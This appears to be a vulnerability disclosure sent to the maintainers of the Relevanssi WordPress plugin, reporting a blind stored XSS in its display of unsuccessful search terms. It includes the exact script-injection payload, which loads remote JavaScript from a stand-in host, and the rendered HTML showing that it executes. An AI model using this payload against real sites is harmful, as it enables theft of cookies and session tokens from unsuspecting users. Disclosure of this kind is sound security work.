Good afternoon. Beginning on 12 October 2021, our XSS catcher started receiving callbacks from a group of sites that are using the Relevanssi plugin for Wordpress. It appears to us that the software is not properly filtering Unsuccessful searches
before displaying the information to the user. One of the sites that we received a blind stored XSS callback from is an offshore private
bank. π
Our payload was sent via the websiteβs search form and was formatted like so: foo"><script src=//xss></script><x="
, which was displayed to the userβs of your plug-in like so:
<td>foo"><script src="//xss"></script><x=" <a="" href="https://website/?s=foo%22%3E%3Cscript%20src%3D%2F%2Fxss%3E%3C%2Fscript%3E%3Cx%3D%22"><span></span></x="></td>
<td style="padding: 3px 5px; text-align: center">2</td>
This flaw allows attackers to pass rogue JavaScript to unsuspecting users. Since the userβs browser has no way to know the script should not be trusted, it will execute the script, which can then access any cookies, session tokens, or other sensitive information retained by the browser and used with your website. In fact, here is a list of 21 other things that hackers can do with an XSS flaw: https://s0md3v.github.io/21-things-xss/